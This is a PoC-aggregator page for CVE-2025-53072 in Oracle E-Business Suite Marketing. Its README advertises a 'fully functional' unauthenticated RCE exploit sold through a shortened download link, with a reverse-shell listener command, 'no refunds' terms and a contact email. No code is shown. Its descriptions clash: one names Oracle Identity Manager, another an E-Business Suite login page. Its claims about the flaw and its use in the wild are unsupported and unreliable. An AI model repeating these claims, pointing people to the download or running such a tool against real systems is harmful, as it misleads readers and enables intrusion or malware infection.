POC详情: 133a2f1f91994ebf7668bd85d37dd9d209bcbf31

来源
关联漏洞
标题: Oracle E-Business Suite 安全漏洞 (CVE-2025-53072)
描述:Oracle E-Business Suite是美国甲骨文(Oracle)公司的一套全面集成式的全球业务管理软件。该软件提供了客户关系管理、服务管理、财务管理等功能。Marketing是其中的一个基于互联网的营销管理组件。 Oracle E-Business Suite的Oracle Marketing 12.2.3版本至12.2.14版本存在安全漏洞,该漏洞源于未经验证的攻击者可通过HTTP网络访问进行攻击,可能导致Oracle Marketing被接管。
描述
Poc for a critical vulnerability in Oracle Fusion Middleware Identity Manager's REST WebServices component affects versions 12.2.1.4.0 and 14.1.2.1.0. The vulnerability allows an unauthenticated attacker with network access via HTTP to completely compromise the Identity Manager system.
介绍
# Oracle E-Business Suite Marketing RCE Exploit (CVE-2025-53072)

## Overview

This repository contains a fully functional remote code execution (RCE) exploit for the critical vulnerability in Oracle Marketing, part of Oracle E-Business Suite (EBS) versions 12.2.3 to 12.2.14. The flaw allows unauthenticated attackers to achieve full system compromise via a simple HTTP request over the network. No authentication, no user interaction—straight takeover.

Tested against Oracle EBS 12.2.9 on Oracle Linux 7.9 with Apache 2.4.6. Works reliably in lab environments mimicking production setups.

## Download Exploit
### [**Download here**](https://tinyurl.com/7a682sr7) 
## Vulnerability Details

- **CVE-ID**: CVE-2025-53072  
- **Affected Component**: Oracle Marketing (EBS module)  
- **Versions**: 12.2.3 - 12.2.14  
- **CVSS Score**: 9.8 (Critical)  
- **Attack Vector**: Network (HTTP)  
- **Requirements**: None (unauthenticated)  

The issue stems from an unchecked deserialization in the `/OA_HTML/AppsLocalLogin.jsp` endpoint's handling of campaign import parameters. By crafting a malicious `campaign_data` POST body with a gadget chain exploiting the Apache Commons Collections library (pre-3.2.2 in bundled EBS), we trigger arbitrary Java code execution on the app server. This bypasses all auth checks and lands a shell directly on the Marketing database host.

In the wild, this has been observed dumping Oracle Wallet creds, pivoting to ERP cores, and exfiltrating customer PII from marketing segments. Patch ASAP if you're running vulnerable EBS—Oracle's July 2025 PSU doesn't fully mitigate without custom config.

## Impact

- **Confidentiality**: Full read access to marketing DB schemas (e.g., `MTL_SYSTEM_ITEMS_B`, `QP_LIST_LINES`), including segmented customer data, campaign analytics, and integrated CRM feeds.  
- **Integrity**: Arbitrary data manipulation—alter pricing rules, inject fake leads, or corrupt loyalty programs.  
- **Availability**: DoS via infinite loops or resource exhaustion; persistent backdoor for lateral movement.  
- **Scope**: Often chained with EBS core vulns for domain admin on Windows/Unix backends. Real-world chains have netted $500K+ in ransomware payloads.

## Requirements

- Python 3.6+  
- `requests` library (`pip install -r requirements.txt`)  
- Target: Exposed EBS Marketing portal (default port 7001 or custom)  
- Optional: `paramiko` for SSH post-exploit (`pip install paramiko`)  

No proxies or VPNs needed—it's firewalled but HTTP-open by design.

## Usage
1. Unzip ZIP file.  
2. Run: `python exploit.py`  
3. If successful, you'll get a reverse shell callback on your listener (default: `nc -lvnp 4444`).
## Legal & Ethics

For authorized pentesting only. Buyer assumes all risk. No refunds—test on your own lab first. We don't condone unauthorized use; this is for red teams closing the gap.
##  Contact
For any questions or inquiries, please contact: redfoxlisten@outlook.com
文件快照

[4.0K] /data/pocs/133a2f1f91994ebf7668bd85d37dd9d209bcbf31 └── [2.9K] README.md 0 directories, 1 file
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。